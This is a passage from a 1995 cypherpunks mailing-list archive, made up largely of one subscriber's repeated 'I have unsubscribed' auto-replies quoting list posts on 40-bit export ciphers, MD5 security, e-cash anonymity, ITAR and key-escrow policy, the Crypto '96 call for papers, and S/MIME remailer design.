F5+JCQZgFMX8YKI5ToiuCFQotL6V3fbv/cqz5Fzb0jLvmCr6cRIsGx3CvC9Q8X8U
u42i/3WRCXauxN+eqywaMvGftV6YiFf7LMx2PAAXJ17HUlajnA5aQ9/h4NeH8yJC
kaClkbaUiog=
=WZyO
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "A prohibition law strikes a blow at the very principles upon which
  our government was founded" -- Abraham Lincoln 
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>     IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:53 PDT
To: perry@piermont.com (perry)
Subject: RE: Netscape Logic Bomb detailed by IETF
Message-ID: <1995Oct25.091400.1151.341059@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address books. Thanks.

ahg3

 ----------
From:  perry[SMTP:perry@piermont.com]
Sent:  Tuesday, October 24, 1995 6:00 PM
To:  cypherpunks
Subject:  Re: Netscape Logic Bomb detailed by IETF



anonymous-remailer@shell.portal.com writes:
> I see that Perry is as charming as ever?

And I see that you don't know what you are talking about.

> Perry, I just don't think that it is wise to stick your head in the   
sand
> and ignore a severe flaw in your algorithm, while actively   
misrepresenting
> matters to those people who are not intimately familiar with the IETF.

I wonder if you even know what the IETF is, since you seem to be
waving around an organization I work in like it was a mass of chicken
entrails.

> Postscript isn't like any other language around.  Operator names have   
no
> special significance to the interpreter.  You can't just "strip out"
> dangerous commands.  They aren't "reserved" in the sense that operator
> names are in other languages, like COBOL or BASIC.
>
> In Postscript, operator names are simply keys into a LIFO dictionary.

If, Mr. Anonymous, you can get a postscript interpreter to do I/O
after you have stripped all the system calls that do file I/O out of
the C code for the interpreter merely by invoking the names of the I/O
commands in the postscript books, you have managed a feat beyond mere
spoon bending and ought to be studied by the parapsychologists.

In any case, Netscape doesn't write the postscript interpreters and
doesn't have built in support for postscript and doesn't ship mailcap
files that deal with postscript, so I'd say you are a crank worth   
ignoring.

Perry






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:17 PDT
To: cypherpunks@toad.com (cypherpunks)
Subject: RE: 80 bits from 40 bits -- NOT
Message-ID: <1995Oct25.093008.1151.341060@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  baldwin[SMTP:baldwin@RSA.COM]
Sent:  Tuesday, October 24, 1995 2:39 PM
To:  cypherpunks
Subject:  80 bits from 40 bits -- NOT


        Well, let me eat my words.  Unless all layers turn on
encryption at the same time, and there is not predictable text
that passes from one layer to the next, adding encryption at
each layer cannot substantially improve the size of the key
space.  Consider two layers each of which has a verifiable
header and a body of encrypted text.  By "verifyable", I mean
that it contains enough redundancy to recognize a correct
decryption of the cipher added by the lower layer.  For example,
a header that included a content type field and a length field
could be examined to see if it looked reasonable, and thus
confirm a guess at the lower level's cipher.


                Plaintext-Body-1
                      |
                 Layer-1-cipher
                      |
      Header-1, Encrypted-Body-1
               |
            Layer-2-cipher
                   |
   Header-2, Encrypted-Body-2

        To crack this system, an attacker does brute force search
of the keyspace for the layer-2-cipher, for each key check the
decrypted Header-1 value to see if it looks OK, if not, continue,
otherwise start searching the keyspace for the Layer-1-cipher
given the candidate for the Encrypted-Body-1 produced by the
guess at the Layer-2-cipher key.  Clearly, if you have several
layer 2 blocks and they all have good looking values for the
Header-1, then the Layer-2-cipher key is correct.

        The summary is that two layers of 40 bit ciphers with
the first layer adding some verifiable information, has the effect
of adding at most one bit to the effective keysize (doubling the
amount of work).  It DOES NOT increase the keysize to 80 bits.
                --Bob Baldwin


______________________________ Reply Separator
_________________________________
Subject: 80 bit security from 40 bit exportable products
Author:  "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)> at INTERNET
Date:    10/24/95 10:52 AM

        Long ago vendors should have put encryption into network layer
products, but for a variety of reasons that effort was delayed or
discouraged.  One effect of this lack is that almost every layer of
the network stack is adding its own encryption.  For example, the
HTTP session layer added S-HTTP and the TCP transport layer added
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple
products to get more than 40 bits worth of security.  For example,
a web client might fetch an S-HTTP page over an SSL protected link
via a firewall that supports IPsec tunnels.  That's three 40 bit
keys protecting the data over the internet link (of course, this
may not be equivalent to a 120 bit cipher, that depends on the
details of the cipher systems and independence of the key setups).
Interesting possibilities.
                --Bob Baldwin








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:23 PDT
To: sandoval@cic.teleco.ulpgc.es (sandoval)
Subject: RE: textbooks
Message-ID: <1995Oct25.093008.1151.341061@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Patrick Horgan[SMTP:patrick@Verity.COM]
Sent:  Tuesday, October 24, 1995 2:21 PM
To:  sandoval
Cc:  cypherpunks
Subject:  Re: textbooks



I'm Cc:ing this to cypherpunks since I've gotten a lot of requests for   
this
information.

> From: sandoval@cic.teleco.ulpgc.es (Juan Domingo Sandoval Gonzalez)
>
> Dear Patrick,
> Thanks for yor info about "Network Security Private Communication
> in a PUBLIC World" by Kaufman, Perlman and Speciner.
> To buy it I need to know Who published it.
> Do you know the Editor house?
>

"Network Security - PRIVATE Communication in a PUBLIC World", 1995,   
Prentice
Hall PTR, ISBN 0-13-061466-1, by Charlie Kaufman, Radia Perlman, and Mike
Speciner.

This book is amazing.  It explains hard concepts in ways that make them
seem obvious.  I can't state this too emphatically.  The style of the
book is conversational, approachable and a fun read, while at the same
time maintaining technical exactness to the point that you can implement
algorithms from the discussions in this book, (and understand how they
work.)

17.6.2 Coping with Export Controls is very interesting, detailing the   
weird
hoops that Lotus jumped through to retain as much security as possible   
while
still meeting export requirements.  The authors make the point that what
happens to you when you go through this process is almost random   
depending
on the times as well as the individual person you deal with.

The ANS.1 section is blunt about the space problems, and indeed much of   
the
book is refreshingly blunt about the stupidities involved in a lot of   
this
stuff.

The quick proof of why the initial and final permutations add nothing to
the security of DES is presented in an informal and quite obvious   
sidebar.
The comment is made that by the same argument the permutation of the key
in the generating of per-round keys also adds nothing to security.

It also includes homework and would be a wonderful textbook.

Here's an abbreviated version of the TOC.  Note that the real index is   
much
richer than this.  I've given the complete version of section 3.3 to
illustrate.  All typos are mine.  I think we can no longer refer to   
Bruce's
book as the Bible, but must refer to the two books as the Scriptures;)

Could someone refer me to some good crypto oriented math books?   
 Preferably
something as readable as this:)

Chapter 1 Introduction

1.1  Roadmap to the book
1.2  What type of book is this
1.3  Terminology
1.4  Notation
1.5  Primer on Networking
1.6  Tempest
1.7  Firewalls/Security Gateways
1.8  Key Escrow for Law Enforcement
1.9  Key Escrow for Careless Users
1.10 Viruses, Worms, Trojan Horses
1.11 The Military Model of Security
1.12 Legal Issues

Chapter 2 Introduction to Cryptography

2.1  What is Cryptography
2.2  Breaking an Encryption Scheme
2.3  Types of Cryptographic Functions
2.4  Secret Key Cryptography
2.5  Public Key Cryptography
2.6  Hash Alogorithms
2.7  Homework

Chapter 3 Secret Key Cryptography

3.1  Introduction
3.2  Generic Block Encryption
3.3  Data Encryption Standard (DES)
     3.3.1  DES Overview
     3.3.2  The Permutations of the Data
     3.3.3  Generating the Per-Round Keys
     3.3.4  A DES Round
     3.3.5  The Mangler Function
     3.3.6  Weak and Semi-Weak Keys
     3.3.7  What's So Special About DES?
3.4  International Data Encryption Algorithm (IDEA)
3.5  Using Secret Key Cryptography in Protocols
3.6  Encrypting a Large Message
3.7  Generating MICs
3.8  Multiple Encryption DES
3.9  Homework

Chapter 4 Hashes and Message Digests

4.1  Introduction
4.2  Nifty Things to Do with a Hash
4.3  MD2
4.4  MD4
4.5  MD5
4.6  SHS
4.7  Homework

Chapter 5 Public Key Algorithms
5.1  Introduction
5.2  Modular Arithmatic
5.3  RSA
5.4  Diffie-Hellman
5.5  Digital Signature Standard (DSS)
5.6  Zero Knowledge Proof Systems
5.7  Homework Problems

Chapter 6  Number Theory

6.1  Introduction
6.2  Modular Arithmatic
6.3  Primes
6.4 Euclid's Algorithm
6.5  Chinese Remainder Theorem
6.6  Zn*
6.7  Euler's Totient Function
6.8  Euler's Theorem
6.9  Homework Problems

Chapter 7 Authentication Problems

7.1  Password-Based Authentication
7.2  Address-Based Authentication
7.3  Cryptographic Authentication Protocols
7.4  Who is Being Authenticated
7.5  Passwords as Cryptographic Keys
7.6  Eavesdropping and Server Database Reading
7.7  Trusted Intermediaries
7.8  Session Key Establishment
7.9  Authorization
7.10 Delegation
7.11 Homework

Chapter 8 Authentication of People

8.1 Passwords
8.2  On-Line Password Guessing
8.3  Off-Line Password Guessing
8.4  How Big Should a Secret Be?
8.5  Eavesdropping
8.6  Passwords and Careless Users
8.7  Initial Password Distribution
8.8  Authentication Tokens
8.9  Physical Access
8.10 Biometrics
8.11 Homework

Chapter 9 Security Handshake Pitfalls

9.1  Login Only
9.2  Mutual Authentication
9.3  Integrity/Encryption for Data
9.4  Mediated Authentication (with KDC)
9.5  Bellovin-Merritt
9.6  Network Login and Password Guessing
9.7  Nonce Types
9.8  Picking Random Numbers
9.9  X.509 Problem
9.10 Performance Considerations
9.11 Authentication Protocol Checklist
9.12 Homework

Chapter 10 Kerberos V4

10.1 Introduction
10.2 Tickets and Ticket-Granting Tickets
10.3  Configuration
10.4  Logging Into the Network
10.5  Replicated KDCs
10.6  Realms
10.7  Interrealm Authentication
10.8  Key Version Numbers
10.9  Encryption for Privacy and Integrity
10.10 Encryption for Integrity Only
10.11 Network Layer Addresses in Tickets
10.12 Message Formats
10.13 Homework

Chapter 11 Kerberos V5

11.1  ASN.1
11.2  Names
11.3  Delegation of Rights
11.4  Ticket Lifetimes
11.5  Key Versions
11.6  Making Master Keys in Different Realms Different
11.7  Optimizations
11.8  Cryptographic Algorithms
11.9  Hierarchy of Realms
11.10 Evading Password-Guessing Attacks
11.11 Key Inside Authenticator
11.12 Double TGT Authentication
11.13 KDC Database
11.14 Kerberos V5 Messages
11.15 Homework

Chapter 12 Electronic Mail Security

12.1  Distribution Lists
12.2  Store and Forward
12.3  Security Services for Electronic Mail
12.4  Establishing Keys
12.5  Privacy
12.6  Authentication of the Source
12.7  Message Integrity
12.8  Non-Repudiation
12.9  Proof of Submission
12.10 Proof of Delivery
12.11 Message Flow Confidentiality
12.12 Anonymity
12.13 Containment
12.14 Annoying Text Format Issues
12.15 Names and Addresses
12.16 Old Messages
12.17 Homework

Chapter 13 Privacy Enhanced Mail (PEM)

13.1  Introduction
13.2  Establishing Keys
13.3  Some PEM History
13.4  Certificate Hierarchy
13.5  Certificate Revocation Lists (CRLs)
13.6  X.509 Certificates and CRLs
13.7  Reformatting Data to Get Through Mailers
13.8  General Structure of a PEM Message
13.9  Encryption
13.10 Source Authentication and Integrity Protection
13.11 Multiple Recipients
13.12 Bracketing PEM Messages
13.13 Remote Distribution List Exploders
13.14 Forwarding and Enclosures
13.15 Canonicalization
13.16 Unprotected Information
13.17 Message Formats
13.18 DES-CBC as MIC Doesn't Work
13.19 Homework

Chapter 14 PGP (Pretty Good Privacy)

14.1  Introduction
14.2  Overview
14.3  Key Distribution
14.4  Efficient Encoding
14.5  Certificate and Key Revocation
14.6  Signature Types
14.7  Your Private Key
14.8  Key Rings
14.9  Anomalies
14.10 Object Formats

Chapter 15 X.400

15.1  Overview of X.400
15.2  Security Functions Possible with X.400
15.3  Structure of an X.400 Message

Chapter 16 A Comparison of PEM, PGP, and X.400

16.1  Introduction
16.2  Certificate Hierarchy
16.3  Certificate Distribution
16.4  Encryption
16.5  Encoding of Transmitted Messages
16.6  Cryptographic Algorithms Supported
16.7  Recipients with Multiple Keys
16.8  Mail-Intermediary-Provided Functions

Chapter 17 More Security Systems

17.1  NetWare V3
17.2  NetWare V4
17.3  KryptoKnight
17.4  SNMP
17.5  DASS/SPX
17.6  Lotus Notes Security
17.7  DCE Security
17.8  Microsoft Security
17.9  Network Denial of Service
17.10 Clipper
17.11 Homework

Bibliography
Glossary
Index
   _______________________________________________________________________  

  /  These opinions are mine, and not Verity's (except by coincidence;).   
 \
 |                                                       (\   
               |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have   
      |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword   
    |
 |  Phone : (415)960-7600     Mountain View                 \\/    Will   
   |
 |  FAX   : (415)960-7750     California 94303             _/\\   
    Travel |
  \___________________________________________________________\)__________  
/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:29 PDT
To: llurch@networking.stanford.edu (Rich Graves)
Subject: RE: Pointer to article on ex parte searc
Message-ID: <1995Oct25.093009.1151.341062@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Rich Graves[SMTP:llurch@networking.stanford.edu]
Sent:  Tuesday, October 24, 1995 2:21 PM
To:  cypherpunks
Subject:  Pointer to article on ex parte search & sezure


That's where somebody, e.g. Microsoft or the Church of Scientology, gets
US Federal Marshals to seize your computer.

Article <46j4t6$6od@newsbf02.news.aol.com> in alt.religion.scientology is   

a good article by Adam S. Bauman of the Los Angeles Times. You might find   

it interesting, but not quite relevant enough to post the whole thing
here.

 -rich






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:50 PDT
To: mab@research.att.com (Matt Blaze)
Subject: RE: CRYPTO '96 CFP
Message-ID: <1995Oct25.093009.1151.341063@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Matt Blaze[SMTP:mab@research.att.com]
Sent:  Tuesday, October 24, 1995 5:22 PM
To:  cypherpunks
Subject:  CRYPTO '96 CFP

Sender: owner-cypherpunks@toad.com
Precedence: bulk

                            CRYPTO '96

         August 18-22, 1996, Santa Barbara, California, USA

                          CALL FOR PAPERS


General Information:

Crypto '96, the Sixteenth Annual Crypto Conference, is organized by the
International Association for Cryptologic Research (IACR), in
cooperation with the IEEE Computer Society Technical Committee on
Security and Privacy, and the Computer Science Department of the
University of California, Santa Barbara.  Original papers are solicited
on all technical aspects of cryptology.

Instructions for Authors:

Please send a cover letter, one title page and 16 copies of an extended
abstract.  They must be received by the Program Chair at the address
given below no later than February 14, 1996 (or postmarked by February
4, 1996 and sent via airmail).

The cover letter must state: "This paper does not substantially
duplicate work that any of the authors have published elsewhere or have
submitted in parallel to any other conference or workshop that has
proceedings."

The title page should contain the title, the names of the authors, their
postal and e-mail addresses and the short abstract; it should be made
clear who is the author to whom correspondence should be sent.  The
first page of the extended abstract should be an informal one-page
statement (that will not be published in the Proceedings) describing the
content of the oral presentation that will be given at Crypto '96 in the
event the paper is accepted (this statement is expected to be different
from the short abstract of the paper).  This page and the extended
abstract must be ANONYMOUS, i.e., they must contain no indication
whatsoever of the identity of the author(s).  The main body of the
extended abstract should start with the title, short abstract, and list
of keywords.  This should be followed by a succinct statement
appropriate for a non-specialist reader specifying the subject
addressed, its background, the main achievements, and their significance
to cryptology.  Technical details directed to the specialist should then
follow.

Submissions are limited to 10 single-spaced pages of 11pt type, not
counting the bibliography and clearly marked appendices.  Since referees
are not required to read the appendices, the paper should be
intelligible without them.  The paper including bibliography and
appendices must run to no more than 15 pages.  These limits will be
strictly enforced.

Unfortunately, because of the burdens on the Program Committee and
the need to keep strictly to the time schedule, we will have to
summarily reject any submission not in keeping with the above
instructions.

Authors are encouraged to make 2-sided copies if possible.  Please send
submissions by post; unfortunately, we cannot accept submissions by
e-mail or fax.

Notification of acceptance or rejection will be sent to authors on
April 22, 1996.

Conference Proceedings:

Proceedings will be available at the meeting.  They will be published in
the Springer-Verlag Lecture Notes in Computer Science.  Clear
instructions about the final copy will be sent to authors of accepted
papers.  The final copies of the accepted papers will be due on June 1,
1996.  Final papers arriving too late will be removed from the main
program.  Authors of accepted papers must guarantee that their paper
will be presented at the conference.

Stipends:

A limited number of stipends are available to those unable to obtain
funding to attend the conference.  Students whose papers are accepted
and who will present the paper themselves are encouraged to apply if
such assistance is needed.  Requests for stipends should be addressed to
the general chair.

Send submissions to:

Neal Koblitz, Program Chair, Crypto '96
Dept. of Mathematics, Box 354350
University of Washington
Seattle, WA 98195 U.S.A.
Internet: koblitz@math.washington.edu
Phone: 1-206-543-4386

For other information contact:

Richard Graveman, General Chair, Crypto '96
Bellcore
444 Hoes Lane RM 1K-221
Piscataway, NJ 08854 U.S.A.
Internet: rfg@ctt.bellcore.com
Phone: 1-908-699-4611

Program Committee:

Neal Koblitz, Chair (Mathematics, University of Washington, USA)

Mihir Bellare (Computer Science, University of California at San Diego,   
USA)
Josh Benaloh (Microsoft, USA)
Matt Blaze (AT&T Bell Laboratories, USA)
Johannes Buchmann (Computer Science, Universitaet des Saarlandes,   
Germany)
Don Coppersmith (IBM Research, USA)
Joan Feigenbaum (AT&T Bell Laboratories, USA)
Andrew Klapper (Computer Science, University of Kentucky, USA)
Lars Knudsen (Computer Science, Ecole Normale Superieure, France)
Peter Landrock (Mathematics, Aarhus University, Denmark)
Tsutomu Matsumoto (Electrical & Computer Engineering, Yokohama National
University, Japan)
Chris Mitchell (Computer Science, University of London, UK)
Paul Van Oorschot (Bell-Northern Research, Canada)
Bart Preneel (Catholic University at Leuven, Belgium)
Rainer Rueppel (R3 Security Engineering, Switzerland)
Jacques Stern (Computer Science, Ecole Normale Superieure, France)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:29:47 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: RE: MD5 concerns, was Re: Netscape Logic
Message-ID: <1995Oct25.093009.1151.341065@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Patrick Horgan[SMTP:patrick@Verity.COM]
Sent:  Tuesday, October 24, 1995 1:08 PM
To:  fc
Cc:  cypherpunks
Subject:  MD5 concerns, was Re: Netscape Logic Bomb detailed by IETF


> channel.  I think that Netscape uses an MD5 checksum which the members
> of this list seem to place unlimited trust in (incorrectly in my view,

This is the second time you've implied that an MD5 checksum might not be
as secure as we think.  Could you share your thinking on this?  I had
believed from reading the algorithm that it's not possible to predict how
a change in the input will affect the checksum.  Given a modified version
of netscape for example, how would you change some non-critical portion   
of
the code to get the same checksum that the original should have.  I   
suppose
that give n bits of non-critical space in the code, (non-critical meaning
that changing them will have no effect on the execution of the code, and
assuming that you don't want to change the length of the code), that you
could try all possible combinations of those bits, or 2^n trials and
see if you get the correct MD5 checksum.  If you do, then on average   
you'd
actually only have to try 2^(n-1) trials. What if you don't?  What would
you do then?  MD5 produces a 128 bit output, and it would seem likely   
that
this would be hard.  As far as I know there are no known attacks for any
MDx algorithms in spite of Ron's worries about MD4.  It's a subject of
on-going research though, and it is only "conjectured that it is
computationally infeasible to produce two messages having the same
message digest, or to produce any messages having a given prespecified
target message digest." (RFC 1321)  So, if you have newer information,
or pointers to any papers, (other than the ben Boer and Bosselaers   
papers),
could you let me know?

Thanks,

Patrick

   _______________________________________________________________________  

  /  These opinions are mine, and not Verity's (except by coincidence;).   
 \
 |                                                       (\   
               |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have   
      |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword   
    |
 |  Phone : (415)960-7600     Mountain View                 \\/    Will   
   |
 |  FAX   : (415)960-7750     California 94303             _/\\   
    Travel |
  \___________________________________________________________\)__________  
/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:01 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: RE: How can e-cash, even on-line cleared
Message-ID: <1995Oct25.093010.1151.341066@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Wei Dai[SMTP:weidai@eskimo.com]
Sent:  Tuesday, October 24, 1995 1:55 PM
To:  Hal
Cc:  cypherpunks
Subject:  Re: How can e-cash, even on-line cleared, protect payee   
identity?


On Mon, 23 Oct 1995, Hal wrote:

> This is an interesting idea but it is more complicated than necessary,   
I
> think.  The denomination can be carried in the exponent, in which case
> there is no need for cut and choose and nobody can cheat the bank.  A
> coin suitable for deposit is a signed number of some special form.  To
> pay Bob, Alice does not withdraw anything ahead of time.  Rather, Bob
> gives her a blinded coin, which she reblinds and gives to the bank.   
 The
> bank signs it (debiting Alice's account) and gives it back to her.  She
> strips off her blinding and gives it to Bob.  He strips off his own
> blinding and verfifies that he is left with a signed number of the
> appropriate form.

Using the above protocol, payee anonymity will not be compromised by
collusion between the bank and the payer, but the payee and the bank can
collude to identify the payer!  (This reverses the situation in normal
Chaumian ecash, and of course in certain circumstances may be   
preferable.)

This collusion can succeed even if Alice (the payer) reblinds the coin
she gets from Bob before asking the bank to sign it, because Alice must
withdraw the coin after Bob gives it to her and before returning it to   
Bob.
Bob can ask the bank to record the names of everyone who withdrew money
during that period, and after two or three repeated transactions can
narrow the list of possible payers down to one person.  (This is   
reminescent
of the time-correlation attack on remailers.)  In the original protocol
this isn't possible because Alice can withdraw the money ahead of time.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:00 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: RE: USA Today Against ITAR & GAK
Message-ID: <1995Oct25.093010.1151.341069@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Cypherpunks Mailing List[SMTP:cypherpunks@toad.com]
Sent:  Tuesday, October 24, 1995 4:51 PM
To:  Cypherpunks Mailing List
Subject:  USA Today Against ITAR & GAK


I'm pleased to report that USA Today editorializes today (Tuesday, Oct.   
24,
1995) against both ITAR and GAK.

They get the chronology of the SSL brute-forcing and PRNG seed prediction
attacks on Netscape Navigator backwards, but they get many other things   
right
in a fairly short editorial. I am certainly encouraged by this   
development.
Someone at USA Today definitely got the message that the ITAR are a large
obstacle to net security in the U.S.

Some particularly apropos quotations (from pg. 12A):
   

On ITAR:
 "[After the Netscape hacks] the perception of the Internet as
  insecure was indelible. That needn't be. Encryption software
  available right now is exponentially more powerful and could
  make code breaking virtually impossible. Its use is blocked
  by government export regulations that make the programs
  difficult if not impossible to market, even for domestic
  purposes."

On GAK:
 "[...] key escrow [...] may sound reasonable, but apply that
  reasoning to more mundane areas of life. What the government
  is saying is yes, you can put bars on your windows, locks on
  your doors and put your jewelry in a safe, but you have to
  give us the keys and the combination because you might be a
  crook."

That phrasing sounds rather familiar....

 "The [GAK] system -- which the FBI and the Commerce Department
  declined to defend in an opposing view to this editorial [...]"

Now I find that surprising. Since when does the FBI not even try to   
justify
Clipper and its descendants in the newspapers ?

For foreign readers, I'll note that USA Today has easily the largest
national circulation of any daily newspaper in the U.S.

[Letters to the editor can be emailed to usatoday@clark.net; they want   
you
 to give your snail-mail address and home and work phone numbers so they
 can check your identity.]

 -Futplex <futplex@pseudonym.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:30:06 PDT
To: sameer@c2.org (sameer)
Subject: RE: What is needed for S/MIME remailer ?
Message-ID: <1995Oct25.093010.1151.341071@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Raph Levien[SMTP:raph@CS.Berkeley.EDU]
Sent:  Tuesday, October 24, 1995 1:27 PM
To:  sameer
Cc:  cypherpunks; baldwin
Subject:  Re: What is needed for S/MIME remailer ?


sameer writes, among other things:

> A) limit on number of multiple concurrent procersses doing
> decryption. Remailer spams have the bad effect of spwaning hundreds of
> concurrent PGPs on the mailhost, bringing things to halt. Limiting
> number of concurrent decryptions would help this problem.

Agreed.

> B) A strong interaction with the UNIX shell, with the program
> returning a return code based on whether or not the decryption
> succeeded. (Remailers only do decryptions...) That way a remailer
> could something like:

We very much need a command line interface to S/MIME, to use in remailers
and also for other kinds of testing/hacking. I hope one is forthcoming
soon.

>  I think the smime should be easily plugged into premail as
> well, but I don't know premail to know what would be necessary for
> that. I suspect Raph would have some input on that matter.

Raph does indeed have some input on the matter. I am currently rewriting
premail from the ground up, and am about 700 lines into it. One specific
design goal was the support of other types of encryption, including
Mixmaster and MOSS in the first release, and hopefully others as well.
Basically, I'm waiting on a command line S/MIME implementation as
described above, most hopefully as free software.

In any case, the new premail is _much_ more modular, so plugging in
experimental email stuff should be pretty straightforward.

Raph







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:18 PDT
To: mixmaster@obscura.com (Mixmaster)
Subject: RE: No Subject
Message-ID: <1995Oct25.091200.1151.341073@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Mixmaster[SMTP:mixmaster@obscura.com]
Sent:  Tuesday, October 24, 1995 1:10 PM
To:  cypherpunks
Subject:  No Subject



To All,

    A theme I have been thinking about lately is a virtual
data haven using a m from n secret splitting scheme via
a DC Net for access and hosting the entire process via HTML
and W3. The salient feature would be database objects split in such a way   
that
participating
sites would possess no more than 1 encrypted slice of any particular
encrypted object. Some redundancy of storage is built into the design and
participating site give up local storage to store other slices
of the datahaven. At no time is the site hosting able to
make correlations of slices to plaintext traffic because the
split is done on the users workstation and the placement of the slice
on the individual slice on the member datahaven site is accomplished with
encrypted remailer tech(probably Mixmaster 2) and CGI or java
scripts. The idea here is to be able to store ANY information on the net
not just what the local bluenoses approve of.

    anon








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:05 PDT
To: jeffb@sware.com (Jeff Barber)
Subject: RE: 80 bit security from 40 bit exportab
Message-ID: <1995Oct25.093122.1151.341074@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  Jeff Barber[SMTP:jeffb@sware.com]
Sent:  Tuesday, October 24, 1995 4:05 PM
To:  RobertW.Baldwin
Cc:  cypherpunks
Subject:  Re: 80 bit security from 40 bit exportable products


baldwin writes:
>
>         Long ago vendors should have put encryption into network layer
> products, but for a variety of reasons that effort was delayed or
> discouraged.  One effect of this lack is that almost every layer of
> the network stack is adding its own encryption.  For example, the
> HTTP session layer added S-HTTP and the TCP transport layer added
> SSL.  Soon we will have network layer encryption with IPsec.
>         The vendors for each layer can export a product that uses
> ciphers with 40 bit keys.  A user can then combine multiple
> products to get more than 40 bits worth of security.  For example,
> a web client might fetch an S-HTTP page over an SSL protected link
> via a firewall that supports IPsec tunnels.  That's three 40 bit
> keys protecting the data over the internet link (of course, this
> may not be equivalent to a 120 bit cipher, that depends on the
> details of the cipher systems and independence of the key setups).
> Interesting possibilities.
>                 --Bob Baldwin

Even if you assume complete independence of key setup, if a successful
decryption at each layer can be independently detected and verified
(which seems likely in your example), there're only about 3 * (2 ^ 40)
total operations in the worst case, NOT 2 ^ (3 * 40) operations needed
to expose the plaintext.  This is an effective 41.5 bits, not 120.


 -- Jeff






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: agermain@cmp.com (Germain Arthur)
Date: Wed, 25 Oct 95 06:31:16 PDT
To: sameer@c2.org (sameer)
Subject: RE: What is needed for S/MIME remailer ?
Message-ID: <1995Oct25.093122.1151.341075@smtpgate.cmp.com>
MIME-Version: 1.0
Content-Type: text/plain



I have unsubscribed from this mailing list. Please remove my name from   
your personal address lists. Thanks.

ahg3

 ----------
From:  sameer[SMTP:sameer@c2.org]
Sent:  Tuesday, October 24, 1995 1:15 PM
To:  RobertW.Baldwin
Cc:  cypherpunks; raph
Subject:  Re: What is needed for S/MIME remailer ?


My understanding of S/MIME isn't excellent, so I figure there are
things I could be confused about which may make this a bit wrong..

I figure a command line S/MIME program which could easily be
integrated into a remailer wouldhave the following features:

A) limit on number of multiple concurrent procersses doing
decryption. Remailer spams have the bad effect of spwaning hundreds of
concurrent PGPs on the mailhost, bringing things to halt. Limiting
number of concurrent decryptions would help this problem.

B) A strong interaction with the UNIX shell, with the program
returning a return code based on whether or not the decryption
succeeded. (Remailers only do decryptions...) That way a remailer
could something like:

#!/bin/sh
if smime -f < incoming-message > /tmp/decrypted.$$
then
  # Process /tmp/decrypted
fi
